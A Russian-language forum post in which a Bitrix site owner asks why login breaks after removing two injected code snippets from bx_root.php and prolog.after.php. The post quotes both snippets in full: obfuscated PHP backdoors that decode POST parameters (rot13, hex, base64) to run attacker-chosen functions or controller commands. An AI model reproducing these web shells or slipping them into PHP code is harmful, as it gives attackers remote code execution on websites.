Помогите, пожалуйста, вылезает проблема с авторизацией
Удаляю этот кусок кода из bx_root.php
и вот этот из prolog.after.php
Удаляю этот кусок кода из bx_root.php
Цитата |
---|
Используя ДРУГУЮ уязвимость поражают \bitrix\modules\main\bx_root.php дописывая в его конец это: <? if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))); ?> |
и вот этот из prolog.after.php
Код |
---|
define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4=")); if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){$APPLICATION->RestartBuffer();CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);die();} |
После этого на сайт не получается авторизоваться, пишет в адресной строке
Если эти куски кода возвращаю - авторизация снова проходит в обычном режиме....куда еще нужно посмотреть? почему может быть такой эффект от удаления этого кода, которого изначально не было
жду помощи 🙏